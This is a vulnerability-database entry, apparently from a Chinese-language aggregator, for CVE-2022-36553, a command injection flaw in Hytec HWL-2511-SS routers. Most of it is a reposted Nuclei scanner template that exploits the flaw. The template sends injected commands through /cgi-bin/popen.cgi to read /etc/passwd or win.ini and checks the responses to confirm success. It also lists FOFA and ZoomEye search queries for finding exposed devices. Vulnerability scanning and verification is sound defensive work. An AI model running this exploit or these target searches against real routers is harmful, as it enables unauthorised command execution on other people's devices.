CVE-2022-36553: Hytec Inter HWL-2511-SS - Remote Command Execution

日期: 2025-08-01 | 影响软件: Hytec Inter HWL 2511 SS | POC: 已公开

漏洞描述

Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi.

PoC代码[已公开]

id: CVE-2022-36553

info:
  name: Hytec Inter HWL-2511-SS - Remote Command Execution
  author: HuTa0
  severity: critical
  description: |
    Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36553
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/cellular-router-rce.yaml
    - https://gist.github.com/Nwqda/b27418ab801eb0b9cdbe8d042cb0249b
    - https://hytec.co.jp/eng/products/our-brand/hwl-2511-ss.html
    - https://hytec.co.jp/eng/wordpress/wp-content/uploads/2019/09/hwl-2511-ss-ds.3.0.pdf
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-36553
    cwe-id: CWE-77
    epss-score: 0.93013
    epss-percentile: 0.99769
    cpe: cpe:2.3:o:hytec:hwl-2511-ss_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: hytec
    product: hwl-2511-ss_firmware
    fofa-query: title="index" && header="lighttpd/1.4.30"
    zoomeye-query: app="Hytec Inter HWL-2511-SS"
  tags: cve2022,cve,hytec,rce

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912 HTTP/1.1
        Host: {{Hostname}}

    payloads:
      command:
        - "cat%20/etc/passwd"
        - "type%20C://Windows/win.ini"
    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - "contains(body_1, '<title>index</title>')"
          - "status_code == 200"
        condition: and

      - type: dsl
        dsl:
          - "contains(body, 'bit app support')"
          - "contains(body, 'fonts')"
          - "contains(body, 'extensions')"
          - "status_code == 200"
          - "contains(body_1, '<title>index</title>')"
        condition: and
# digest: 4b0a00483046022100fbca4d00c71941eaba3839c559e9cb97c56107f1ada84cfb2b86f543d148432402210089a7676824794e957716b991107ff2a1ef7174d1e720392aa037b77e5f8ac51c:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-36553.yaml